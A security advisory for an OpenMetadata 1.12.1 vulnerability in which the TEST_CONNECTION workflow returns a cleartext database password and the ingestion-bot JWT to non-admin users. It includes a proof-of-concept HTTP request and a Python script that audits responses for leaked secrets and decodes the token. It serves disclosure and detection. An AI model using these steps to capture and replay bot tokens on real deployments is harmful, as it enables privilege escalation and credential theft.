CVE-2026-46481: OpenMetadata: TEST_CONNECTION workflow leaks ingestion-bot JWT and database password to regular users
This is not applicable if the deployment configures a Secrets Store (an external secrets manager) to hold credentials. Please make sure to follow the best practices when deploying in production.
In OpenMetadata 1.12.1, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both:
- The cleartext database password in request.connection.config.password.
- The ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken.
The leaked ingestion-bot token can then be reused in an Authorization: Bearer <jwt> header to call sensitive service APIs (for example, GET /api/v1/services/databaseServices/{id}?include=all) with bot-level privileges.
This is distinct from GHSA-pqqf-7hxm-rj5r: it affects the automations/workflows TEST_CONNECTION endpoint on OpenMetadata 1.12.1, not the ingestion pipelines endpoints.
Version / Product
- Product: OpenMetadata (open source, Apache 2.0)
- Version: 1.12.1
- GET /api/v1/system/version → {"version":"1.12.1","revision":"618a2dc2ec8f70ffcd0378ee14ce92cb4f98f0c5"}
- Deployment: OpenMetadata server with SSO via Azure AD (OAuth), Oracle database service, secrets in the DB secrets manager (secretsManagerProvider: "db").
Preconditions
- Authenticated SSO user with access to the UI.
- User can open a Database Service and click “Test connection”.
- No server admin role, no shell/DB access.
PoC (short)
Log in as a regular SSO user.
In the UI go to Settings → Services → Database Services → utplrac_scan2_srvetel, open the Connection tab and click “Test connection”.
The browser sends:

POST /api/v1/automations/workflows HTTP/1.1
Host: catalogodatos-test.utpl.edu.ec
Authorization: Bearer <Azure_AD_user_JWT>
Content-Type: application/json

{
  "name": "test-connection-Oracle-XXXX",
  "workflowType": "TEST_CONNECTION",
  "request": {
    "connection": {
      "config": {
        "type": "Oracle",
        "scheme": "oracle+cx_oracle",
        "username": "qpro_gobierno_datos",
        "password": "********",
        "hostPort": "172.16.54.32:1521",
        …
      }
    },
    "serviceType": "Database",
    "connectionType": "Oracle",
    "serviceName": "utplrac_scan2_srvetel"
  }
}
Note: in the request the password is masked as “********”.
The server responds with HTTP 201 and a body similar to:
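The response body itself is not reproduced on this page. As an added example (not code from OpenMetadata or from the advisory), the following Python script builds the same TEST_CONNECTION request the UI sends, with the password masked exactly as the UI does, and audits the JSON the server returns for the two fields named above: any password or jwtToken that comes back non-empty and unmasked is reported, and the payload of a leaked token is decoded (without signature verification) to show which principal it belongs to. The sample response and the bot token inside it are constructed for the example, the nesting of openMetadataServerConnection is an assumption, and check_instance is a helper name chosen here; it is the only part that talks to a server and should be run only against an instance you are authorized to test.

```python
"""Audit an OpenMetadata TEST_CONNECTION workflow response for leaked secrets.

Added example, not project code. Walks the returned JSON recursively so the
check does not depend on the exact nesting the server uses.
"""
import base64
import json
import urllib.request
from typing import Any, Iterator

MASK = "********"                       # what the UI sends instead of the stored password
SECRET_KEYS = {"password", "jwttoken"}  # matched case-insensitively on the last path segment
WORKFLOW_ENDPOINT = "/api/v1/automations/workflows"


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def build_test_connection_request(service_name: str, config: dict[str, Any]) -> dict[str, Any]:
    """Mirror the body the UI posts. The caller only ever supplies the mask, never the real password."""
    return {
        "name": f"test-connection-{config['type']}-audit",
        "workflowType": "TEST_CONNECTION",
        "request": {
            "connection": {"config": dict(config)},
            "serviceType": "Database",
            "connectionType": config["type"],
            "serviceName": service_name,
        },
    }


def walk(obj: Any, path: str = "") -> Iterator[tuple[str, Any]]:
    """Yield (dotted path, leaf value) for every scalar in a JSON document."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from walk(value, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from walk(value, f"{path}[{index}]")
    else:
        yield path, obj


def find_leaked_secrets(response: dict[str, Any]) -> list[tuple[str, str]]:
    """Return (path, value) for secret-named fields that came back non-empty and unmasked."""
    leaks = []
    for path, value in walk(response):
        leaf = path.rsplit(".", 1)[-1].lower()
        if leaf in SECRET_KEYS and isinstance(value, str) and value and value != MASK:
            leaks.append((path, value))
    return leaks


def jwt_claims(token: str) -> dict[str, Any]:
    """Decode only the payload (no signature check) to see whose token leaked."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS")
    payload = parts[1] + "=" * (-len(parts[1]) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def check_instance(base_url: str, user_token: str, body: dict[str, Any]) -> list[tuple[str, str]]:
    """Post the workflow as a regular user and audit the 201 body. Network call; not run here."""
    req = urllib.request.Request(
        base_url.rstrip("/") + WORKFLOW_ENDPOINT,
        data=json.dumps(body).encode(),
        headers={"Authorization": f"Bearer {user_token}", "Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return find_leaked_secrets(json.load(resp))


# ---- constructed sample data: not a real token, not a real server response ----
SAMPLE_BOT_JWT = ".".join([
    _b64url(json.dumps({"alg": "RS256", "typ": "JWT"}).encode()),
    _b64url(json.dumps({"sub": "ingestion-bot", "isBot": True, "iss": "open-metadata.org"}).encode()),
    _b64url(b"not-a-real-signature"),
])

SAMPLE_REQUEST = build_test_connection_request(
    "utplrac_scan2_srvetel",
    {"type": "Oracle", "scheme": "oracle+cx_oracle", "username": "qpro_gobierno_datos",
     "password": MASK, "hostPort": "172.16.54.32:1521"},
)

# Shaped after the two field paths the advisory names; the placement of
# openMetadataServerConnection at the top level is an assumption.
SAMPLE_RESPONSE = {
    "id": "00000000-0000-0000-0000-000000000000",
    "name": SAMPLE_REQUEST["name"],
    "workflowType": "TEST_CONNECTION",
    "request": {
        "connection": {"config": {**SAMPLE_REQUEST["request"]["connection"]["config"],
                                  "password": "S3cretDbPassw0rd"}},  # server filled in the stored secret
        "serviceType": "Database",
        "connectionType": "Oracle",
        "serviceName": "utplrac_scan2_srvetel",
    },
    "openMetadataServerConnection": {
        "hostPort": "http://openmetadata-server:8585/api",
        "authProvider": "openmetadata",
        "securityConfig": {"jwtToken": SAMPLE_BOT_JWT},
    },
}

if __name__ == "__main__":
    for path, value in find_leaked_secrets(SAMPLE_RESPONSE):
        print(f"LEAK {path} = {value[:12]}...")
    print("leaked token subject:", jwt_claims(SAMPLE_BOT_JWT)["sub"])
```

A clean server leaves find_leaked_secrets empty because the request it echoes back carries only the mask and no bot token; the two paths it reports on the sample are exactly the ones this advisory describes, and the decoded subject shows that the token belongs to the bot rather than to the calling user.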